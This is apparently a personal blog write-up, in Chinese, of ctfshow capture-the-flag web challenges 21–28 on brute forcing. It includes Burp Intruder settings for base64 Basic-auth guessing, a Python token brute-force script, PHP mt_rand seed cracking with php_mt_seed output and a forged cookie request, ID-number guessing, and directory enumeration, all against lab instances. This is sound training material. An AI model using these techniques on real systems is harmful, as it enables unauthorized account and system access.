hacker web ctfshow_爆破处理 CH0ico 2024-07-20 2024-07-26 web 21 以: username:passwd 然后 base64 加密 (a:a >> YTph)
Authorization: Basic YTph
发送 Intruder
payload : Custom iterator
option : < username >+< : >+
process : encode.base64
注意 需要取消勾选自动的 URL 编码
web 22 子页面爆破 ( 跟御剑扫一样
挖掘工具 : BP 或者 在线子域名爆破 (zcjun.com)
web 23 1. python 爆破 1 2 3 4 5 6 7 8 if (isset ($_GET ['token' ])){ $token = md5 ($_GET ['token' ]); if (substr ($token , 1 ,1 )===substr ($token , 14 ,1 ) && substr ($token , 14 ,1 ) ===substr ($token , 17 ,1 )){ if ((intval (substr ($token , 1 ,1 ))+intval (substr ($token , 14 ,1 ))+substr ($token , 17 ,1 ))/substr ($token , 1 ,1 )===intval (substr ($token , 31 ,1 ))){ echo $flag ; } } }
token 被 md5 加密
且它的 1 位=14 位=17 位
( 1 位+14 位+17 位) / 1 位 = 31 位
1 2 3 4 5 6 7 8 9 10 11 12 import requestsa = "3abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ012456789" for i in a: for j in a: url ="http://5aad3711-167d-4268-94b4-3bb1a93ae1f0.chall.ctf.show/?token=" +str (i)+str (j) req = requests.get(url=url).text if "flag" in req: print (req) exit() else : print (url)
2. BP 爆破 ../?token=x
x from 0 to 100000
x=422 的时候满足条件
web 24 1 2 3 4 5 6 7 $r = $_GET ['r' ];mt_srand (372619038 );if (intval ($r )===intval (mt_rand ())){ echo $flag ;
给 seed 运行伪随机数
1 2 3 4 5 6 7 <?php mt_srand (372619038 );echo mt_rand ();?>
得到 1155388967 就是 r
web 25 mt_scrand(seed)这个函数的意思,是通过分发 seed 种子,然后种子有了后,靠 mt_rand()生成随机数。
这里没有明确给出 seed,因此我们需要用工具逆推出 seed
1 2 3 4 5 6 7 8 9 10 11 12 $r = $_GET ['r' ];mt_srand (hexdec (substr (md5 ($flag ), 0 ,8 )));$rand = intval ($r )-intval (mt_rand ());if ((!$rand )){ if ($_COOKIE ['token' ]==(mt_rand ()+mt_rand ())){ echo $flag ; } }else { echo $rand ;
php_mt_seed/php_mt_seed-4.0.tar.gz at master · Al1ex/php_mt_seed · GitHub
tar -zxvf php_mt_seed-4.0.tar.gz
chmod 777 php_mt_seed.c
分析代码 $rand = intval($r)-intval(mt_rand()); 我们令 r=0 反推出 mt_rand=1840740281
time ./php_mt_seed 1840740281
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 Pattern: EXACT Version: 3.0 .7 to 5.2 .0 Found 0 , trying 0x30000000 - 0x33ffffff , speed 13421.8 Mseeds/s seed = 0x335e8ff2 = 861835250 (PHP 3.0 .7 to 5.2 .0 ) seed = 0x335e8ff3 = 861835251 (PHP 3.0 .7 to 5.2 .0 ) Found 2 , trying 0x78000000 - 0x7bffffff , speed 11842.7 Mseeds/s seed = 0x7ac9763c = 2060023356 (PHP 3.0 .7 to 5.2 .0 ) seed = 0x7ac9763d = 2060023357 (PHP 3.0 .7 to 5.2 .0 ) Found 4 , trying 0xfc000000 - 0xffffffff , speed 11426.6 Mseeds/s Version: 5.2 .1 + Found 4 , trying 0xa0000000 - 0xa1ffffff , speed 122.5 Mseeds/s seed = 0xa050ca89 = 2689649289 (PHP 7.1 .0 +) Found 5 , trying 0xd4000000 - 0xd5ffffff , speed 122.2 Mseeds/s seed = 0xd52071a2 = 3575673250 (PHP 5.2 .1 to 7.0 .x; HHVM) seed = 0xd52071a2 = 3575673250 (PHP 7.1 .0 +) Found 7 , trying 0xdc000000 - 0xddffffff , speed 122.1 Mseeds/s seed = 0xdcd24dc3 = 3704769987 (PHP 5.2 .1 to 7.0 .x; HHVM) seed = 0xdcd24dc3 = 3704769987 (PHP 7.1 .0 +) Found 9 , trying 0xe4000000 - 0xe5ffffff , speed 122.2 Mseeds/s seed = 0xe4f8704c = 3841486924 (PHP 5.2 .1 to 7.0 .x; HHVM) seed = 0xe4f8704c = 3841486924 (PHP 7.1 .0 +) Found 11 , trying 0xfe000000 - 0xffffffff , speed 122.3 Mseeds/s Found 11 real 35.51 suser 137.97 s sys 0.04 s cpu 388 %
猜测是 php7 >> 3841486924
分析 $_COOKIE[‘token’]==( mt_rand()+mt_rand() )
当 rand 的值为 0 时,如果 COOKIE token 的值为第二个随机数与第三个随机数之和,输出 flag,因此我们再写一个 php 文件读取第二个随机数与第三个随机数之和
1 2 3 4 5 6 7 8 <?php mt_srand (3841486924 ); mt_rand (); $token = mt_rand ()+mt_rand ();echo $token ;
(中途吃饭去容器过期了 重做了一遍)
payload: $rand=0>>r=mt_rand(1) >>r=1840740281 Cookie.token=$token
1 2 3 GET /?r=1840740281 HTTP/1.1 Cookie:token=1513442793
web 26 抓包(install)的返回包 就有 flag (默认给的 ip port usern passwd 都可以)
web 27
在录取名单中发现学生名字+部分身份证号码 bp 爆破(payloads type 可以选 date 不过我用的 Custom iterator
高先伊 + 621022********5237 (621022199002015237)
爆破成功 a=%E9%AB%98%E5%85%88%E4%BC%8A&p=621022199002015237
1 2 3 {"0" :"success" , "msg" :"\u606d\u559c\u60a8\uff0c\u60a8\u5df2\u88ab\u6211\u6821\u5f55\u53d6\uff0c\u4f60\u7684\u5b66\u53f7\u4e3a02015237 \u521d\u59cb\u5bc6\u7801\u4e3a\u8eab\u4efd\u8bc1\u53f7\u7801" }
1 alert ("\u606d\u559c\u60a8\uff0c\u60a8\u5df2\u88ab\u6211\u6821\u5f55\u53d6\uff0c\u4f60\u7684\u5b66\u53f7\u4e3a02015237 \u521d\u59cb\u5bc6\u7801\u4e3a\u8eab\u4efd\u8bc1\u53f7\u7801" )
弹出内容 >>恭喜您,您已被我校录取,你的学号为 02015237 初始密码为身份证号码
所以账密 : 02015237 / 621022199002015237
web 28
爆破的时候去掉 2.txt 仅仅爆破目录即可
尝试爆破目录 爆破模式改为 cluster bomb ../$x$/$y$/